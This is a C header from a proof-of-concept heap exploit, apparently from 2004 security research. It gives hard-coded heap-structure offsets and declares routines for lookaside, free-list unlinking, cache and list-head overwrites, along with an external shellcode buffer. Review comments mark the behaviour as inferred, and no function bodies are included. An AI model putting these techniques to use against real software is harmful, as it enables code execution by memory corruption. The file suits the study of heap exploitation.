// Proof-of-concept heap exploit code
// Written by Matt Conover in December 2004
/*
 * Hard-coded offsets and sizes into the HEAP structure used by the
 * overwrite routines declared below.
 *
 * NOTE(review): nothing in this file derives these values; they are
 * presumably byte offsets of the free-list, lookaside and cache fields
 * inside one specific heap-manager version -- confirm against the target
 * build before use, since a wrong offset corrupts arbitrary heap memory.
 */
#define FREELIST_OFFSET 0x178
#define FREELIST_SIZE 8
#define LOOKASIDE_OFFSET 0x688
#define LOOKASIDE_SIZE 48
#define CACHE_OFFSET 0x170

/* Number of entries pushed when filling a lookaside list (see FillLookasideList). */
#define LOOKASIDE_FILL_SIZE 4
/* Two allocation sizes in bytes, and their size expressed as (size/8)+1;
 * presumably an 8-byte-granularity chunk count including a one-unit header -- verify. */
#define ALLOC_SIZE 64
#define CHUNK_SIZE ((ALLOC_SIZE/8)+1)
#define ALLOC_SIZE2 72
#define CHUNK_SIZE2 ((ALLOC_SIZE2/8)+1)

/*
 * Heap-manipulation helpers. HEAP, HEAP_CACHE, DWORD, BYTE and BOOL are
 * declared elsewhere; their definitions are not visible in this file.
 * NOTE(review): behaviour below is inferred from names only -- the bodies
 * are not in this file, so treat these descriptions as assumptions.
 */

/* Presumably performs a random mix of allocations and frees with chunk
 * sizes in [MinChunkSize, MaxChunkSize] to shape the heap state. */
void DoRandomAllocsAndFrees(HEAP *pHeap, DWORD MinChunkSize, DWORD MaxChunkSize);
/* Presumably fill / drain the lookaside list for AllocSize-byte chunks. */
void FillLookasideList(HEAP *pHeap, DWORD AllocSize);
void EmptyLookasideList(HEAP *pHeap, DWORD AllocSize);
/* Returns a chunk of AllocSize bytes from pHeap; ownership/failure semantics not visible here. */
BYTE *GetChunk(HEAP *pHeap, DWORD AllocSize);
/* Returns a BOOL; presumably whether the heap cache was set up. */
BOOL InitialHeapCache(HEAP *Heap);

/*
 * One entry point per overwrite technique. Each returns a BYTE pointer;
 * what it points to (the corrupted chunk, or NULL on failure) is not
 * established by this file -- check the definitions before relying on it.
 */
BYTE *DoChunkOnLookasideOverwrite(HEAP *pHeap);
BYTE *DoUnsafeUnlinkingFreeListOverwrite(HEAP *pHeap);
BYTE *DoCacheOverwrite(HEAP *pHeap);
BYTE *DoListHeadOverwrite(HEAP *pHeap);

/* Maps a chunk size to an index into the heap cache; valid range not visible here. */
DWORD GetChunkIndex(HEAP_CACHE *Cache, DWORD ChunkSize);

/* Payload and heap-structure pointers defined in another translation unit. */
extern BYTE *Shellcode;
extern DWORD ShellcodeLength;
extern BYTE *FirstFreeList, *FirstLookaside;

